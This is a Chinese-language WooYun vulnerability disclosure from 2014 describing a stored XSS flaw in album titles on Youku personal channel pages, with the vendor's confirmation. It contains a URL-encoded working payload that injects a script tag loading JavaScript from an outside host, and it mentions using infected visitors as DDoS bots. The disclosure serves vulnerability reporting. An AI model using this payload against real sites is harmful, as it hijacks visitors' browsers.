漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-069124
漏洞标题:优酷主站stored xss可执行任意js代码
相关厂商:优酷
漏洞作者: 爱上电饭锅
提交时间:2014-07-20 19:43
修复时间:2014-09-03 19:44
公开时间:2014-09-03 19:44
漏洞类型:xss跨站脚本攻击
危害等级:高
自评Rank:17
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-07-20: 细节已通知厂商并且等待厂商处理中
2014-07-21: 厂商已经确认,细节仅向厂商公开
2014-07-31: 细节向核心白帽子及相关领域专家公开
2014-08-10: 细节向普通白帽子公开
2014-08-20: 细节向实习白帽子公开
2014-09-03: 细节向公众公开
简要描述:
优酷个人频道(XXX的频道)存在存储型XSS,可加载并允许执行任意外部js代码。如为网络红人,可绑架DDoS僵尸。
详细说明:
说来是个毫无水准的洞,但是危害性不小。
漏洞存在于XXX的频道页面,专辑标题编辑处只做了前端JS过滤,直接发request可以随便提交任意HTML代码。
如下图,页面回显做了encode,可是title没有做。导致可以注入HTML。
测试后发现可以随便插入<script src>引用外站js,并可以顺利执行。于是写了一个有营养的利用代码,把原来的DIV隐藏掉,显示自己的DIV,并执行我的remote js文件打印一段话在页面上,顺便弹框。利用代码如下:
%22%3E%3Cscript%20src%3D%22http%3A%2F%2Fweichch.apphb.com%2Fxss.js%22%3E%3C%2Fscript%3EMalware%20Tag%3Cspan%20class%3D%22append%22%3E%3Ca%20href%3D%22%2Fu%2FUMTYzMjk4NDk5Mg%3D%3D%2Fvideos%22%3E(0)%3C%2Fa%3E%3C%2Fspan%3E%3C%2Fdiv%3E%3Cdiv%20style%3D%22display%3Anone%22%3E
访问个人频道即可触发,效果见漏洞证明部分。
漏洞证明:
修复方案:
只好加班啦
版权声明:转载请注明来源 爱上电饭锅@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:12
确认时间:2014-07-21 07:50
厂商回复:
多谢提醒,马上修复。
最新状态:
暂无